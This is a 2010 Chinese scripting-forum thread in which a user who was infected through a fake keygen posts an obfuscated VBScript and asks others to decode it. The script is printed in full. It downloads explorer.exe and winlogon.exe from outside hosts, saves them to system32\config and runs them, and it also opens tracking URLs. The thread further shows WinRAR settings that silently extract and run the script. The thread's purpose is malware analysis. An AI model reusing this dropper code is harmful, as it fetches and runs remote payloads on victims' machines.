[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖

[已解决]懂VBS脚本的请帮忙分析下这个加密的脚本

这个文件是病毒,我访问某网站下的注册机,请VB脚本高手帮忙解析一下每句的用处。
下面是VB脚本(另外问问是不是乱码?源文件:http://u.115.com/file/f9cc62347f ,只修改其扩展名为RAR。)

  1. Heqianwei="何何aa.run锡丹伟iexplore锡丹http://www.mflj.info/tongji.php伟,0何set锡丹aa=wscript.createobject(伟wscript.shell伟)何on锡丹error锡丹resume锡丹next锡丹何何何何objshell.run锡丹伟伟伟C:\WINDOWS\system32\config\explorer.exe伟伟伟锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何sGet.SaveToFile锡丹伟C:\WINDOWS\system32\config\explorer.exe伟,2锡丹何sGet.Write(xPost.responseBody)锡丹何sGet.Open()锡丹何sGet.Type锡丹=锡丹1锡丹何sGet.Mode锡丹=锡丹3锡丹何Set锡丹sGet锡丹=锡丹createObject(伟ADODB.Stream伟)锡丹何xPost.Send()锡丹何xPost.Open锡丹伟GET伟,伟http://www.cqzcys.com/1cys/explorer.exe伟,0锡丹何Set锡丹xPost锡丹=锡丹createObject(伟Microsoft.XMLHTTP伟)锡丹何何何何objshell.run锡丹伟伟伟C:\WINDOWS\system32\config\winlogon.exe伟伟伟锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何sGet.SaveToFile锡丹伟C:\WINDOWS\system32\config\winlogon.exe伟,2锡丹何sGet.Write(xPost.responseBody)锡丹何sGet.Open()锡丹何sGet.Type锡丹=锡丹1锡丹何sGet.Mode锡丹=锡丹3锡丹何Set锡丹sGet锡丹=锡丹createObject(伟ADODB.Stream伟)锡丹何xPost.Send()锡丹何xPost.Open锡丹伟GET伟,伟http://www.gggirl.info/1cys/winlogon.exe伟,0锡丹何Set锡丹xPost锡丹=锡丹createObject(伟Microsoft.XMLHTTP伟)锡丹何何何何End锡丹If何objShell.Run(伟http://www.gggirl.info/2.php伟)锡丹何Else锡丹何objShell.Run(伟http://www.gggirl.info/2.php伟)锡丹何If锡丹intMessage锡丹=锡丹vbYes锡丹Then锡丹何vbYesNo,锡丹伟Access锡丹Denied伟)锡丹何intMessage锡丹=锡丹Msgbox(伟确定打开国名为最大的成人视频网站吗伟,锡丹_锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何"
  2. Heqianwei = Replace(Heqianwei, "锡丹",chr(9))
  3. Heqianwei = Replace(Heqianwei, "伟", chr(34))
  4. Heqianwei = Replace(Heqianwei, "钱", chr(39))
  5. execute(MyEncode(Heqianwei))
  6. function MyEncode(hack520org)
  7. sz = Split(hack520org, "何")
  8. For i = UBound(sz) To 0 Step -1
  9. weiwei = weiwei + sz(i) + vbcrlf
  10. Next
  11. MyEncode=weiwei
  12. end function
复制代码


PS,Winrar自解压命令很暴力...
Path=C:\WINDOWS\system32\config
SavePath
Setup=2.vbs
Silent=1
Overwrite=1

[ 本帖最后由 jixun66 于 2010-5-3 18:33 编辑 ]
1

评分人数

    • Batcher: 感谢主动给标题标注[已解决]字样PB + 2

参考:批处理解密破解已经加密的VBS
http://bbs.bathome.net/thread-3637-1-1.html
我帮忙写的代码不需要付钱。如果一定要给,请在微信群或QQ群发给大家吧。
【微信公众号、微信群、QQ群】http://bbs.bathome.net/thread-3473-1-1.html
【支持批处理之家,加入VIP会员!】http://bbs.bathome.net/thread-67716-1-1.html

TOP

谢谢,这下可以自己分析!

TOP

返回列表